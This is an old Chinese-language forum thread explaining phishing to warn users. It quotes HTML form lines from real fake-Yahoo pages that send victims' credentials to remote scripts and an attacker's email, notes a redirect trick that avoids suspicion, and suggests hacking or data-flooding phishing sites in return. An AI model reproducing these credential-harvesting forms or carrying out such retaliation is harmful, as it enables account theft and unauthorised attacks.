訪客 zock 發表於 October 27, 2005 檢舉 Share 發表於 October 27, 2005 網路釣魚初體驗序:今天去肥鷹(Http://fetag.org),看到有人在問關於這方面的事情,http://fetag.org/forum/read.php?f=9&i=32180&t=32180,這是那篇文章的連結網址,一時興起就跑去看看,看能不能幫上什麼忙?幫忙取回帳號密碼...抱歉小弟能力不足,這種事情還是要透過Yahoo幫你更改密碼了吧?或是大大們有什麼更好的方法嗎?阿呀呀~煩請告知:)後來發現令人滿舉喪的事情是,那的釣魚網頁是直接架設在自家網站下的帳號密碼還公開來,只差沒來賣錢了,直指.tw的帳號,看了真的不太高興。各位有能力的大大go吧:>簡介網路釣魚:所謂的網路釣魚,通常來說就是指,某人偽造一個跟某網站幾乎一模一樣的網站,來進行欺騙的手段,ex:偽造銀行、Yahoo、Pchome、eBay..等等其實網路釣魚早就已經不是新鮮的事情了,但卻還是能夠令很多人受害,就知道網路釣魚的影響力了。不過通常最主要的還是,受害者沒有足夠的警覺性,和一些雜七雜八的理由,所以網路釣魚才會那麼"興盛"。網路釣魚的手法:通常都是直接偽造一個一模一樣的網站,透過各種方式傳送給你/妳,ex:透過Yahoo及時通,或是E-mail,或是透過其他網站連結..等等,那麼當你/妳收到這個網址時候,輸入自己的密碼後,就會透過這個假造的網頁傳送你的帳號密碼給攻擊者,降子你的帳號密碼就會被盜取了。攻擊者會怎麼接收使用者所傳送的資料呢?通常都是利用<form action="http://sex.sex/sex.php" method="POST">以下格式來傳送使用者所輸進去的帳號資料,.php檔案只是其中之一,也可能是.asp、.cgi..等等不過大致一樣,再透過這些cgi檔案,做後續的工作,ex:把資料在傳送給攻擊者的e-mail或是直接創立一個檔案,或是寫進資料庫..等等。紀錄下被害者的資料,以供攻擊者查看。網路釣魚跟之前出現過的斯巴達木馬有點類似吧,斯巴達木馬不是傳統病毒,也不是特洛伊木馬型的執行檔,而是以一個瀏覽器視窗假冒電腦斷線訊息,並要求使用者輸入帳號密碼重新連線,從而盜取這些資料的一種方式。真實例子:來看看肥鷹文章中提到的網站(http://www.yah-kings.com/its.html),我們直接來看他的網頁原始檔,發現以下幾行:*****************************************************************1 <form action="http://yah-kings.com/X/form.php" method="POST">2 <input type='hidden' name='rec_mailto' value='[email protected]'>3 <input type='hidden' name='rec_subject' value='Got Another 1'>4 <input type='hidden' name='rec_thanks' value='http://tw.yahoo.com'>******************************************************************第1行的意思是說當使用者按下登入按鈕之後,所連結執行的網址,代表我們傳送的資料是直接拿給form.php來執行的,第2行是說會透過網頁直接送e-mail給攻擊者,e-mail帳號是[email protected],第3行是說所寄出e-mail的標題,"Got Another 1" (真是好賺...還Got Another 1勒:|)第4行是說明當上述動作執行完畢之後連結到另一個網頁,這裡將會連接到http://tw.yahoo.com去。form.php可能是愴/url]|將被害者的帳號資料存起來的cgi,而為什麼要送出e-mail呢?大概是因為要另外存放資料吧?是擔心電腦被攻擊嗎?:|關於第4行的處理方式,這裡有點不好,因為一下子轉到yahoo.com.tw會被識破的吧?不過或許他也不在乎了?之前有看過一個台灣人寫的釣魚網頁,也是假冒yahoo,也是傳送給他在免費空間的.php檔案來接收資料,而且被害者執行完後,也會自動跳到Yahoo真正的網頁去,而且顯示密碼輸入錯誤,降子的手法比較不會被受害者識破,算是滿高招的。再看另一個例子:http://geocities.yahoo.com.br/country_strike_games/這個大概是一個巴西人寫的釣魚網頁吧?觀看他的網頁原始碼,會發現一堆加密過的亂碼,解密後可以看到:**********************************************************<FORM action=http://www.insite.com.br/cgi-bin/mailto.cgi method=post> **********************************************************資料傳送給了mailto.cgi這個程式來執行後續的動作,從檔案名稱來看,可能是會把資料傳給攻擊者的e-mail帳號吧?怎樣防範網路釣魚攻擊手段:這邊有幾個大原則要了解一下:1 要小心陌生的e-mial或是yahoo及時通的人傳送給你/妳的網址2 請勿隨意相信其他網站的連結3 注意網頁的網址4 自己到那個想去的網站那邊輸入資料而不是透過別人的網站基本上大部分的釣魚網站,都沒有改變網址的顯示,但是有些瀏覽器漏洞等等可以改變,這點要特別注意,所以觀看網址確保是正確的網站。才輸入帳號密碼。這是一個比較消極的防範方式,但是有可能會有人問,該怎樣反擊這種網站呢?黑掉吧...:|或是傳給他們一堆雜七雜八的資料,寫個程式重複跑,洗他們的資料。或是也是利用程式大量的傳送假的帳號資料,也可以使他們疲於奔命。不過最好的方法就是通知網管人員,拿掉那個網站,因為大部分的釣魚網站都是架設在免費空間的,所以經過通知網管後,通常都可以強制拿掉,或是ban IP吧。後序:這篇文章,技術不高,相信很多人早就知道了,就容小弟我在各位大大面前班門弄釜,如果有錯或是有更好的方法,希望各位大大能夠告訴我。寫這篇是覺得,還是有一些人不知道這個方法,所以就來寫這篇文章了。技術不高,請各位大大手下留情了。 鏈接文章 分享到其他網站
WillH 10 發表於 October 28, 2005 檢舉 Share 發表於 October 28, 2005 hmm...寫的還不錯...不過有些地方可以寫的深入點..可以往 botnet 延伸... or hacker 用 phishing 可能造成的威脅...讓讀者們可以認識更多 :p 鏈接文章 分享到其他網站
∼破曉‧流星雨∼ 10 發表於 January 24, 2006 檢舉 Share 發表於 January 24, 2006 你說的沒錯呀很多phishing的都把你釣到知名網站害人上當的大多數是假冒色情網頁,最後連上某知名網站,而使上當者渾然不覺......誤以為是網頁死了...... 鏈接文章 分享到其他網站
風涯淚雪 10 發表於 February 4, 2006 檢舉 Share 發表於 February 4, 2006 EX:從別人網頁網頁連結到輸入帳號密碼的畫面如果左下方的網址顯示列是正確的,還會有漏洞嗎??PS.那個問題網址的首頁似乎找不到了 鏈接文章 分享到其他網站
Recommended Posts
請登入後來留意見
在登入之後,您才能留意見
立即登入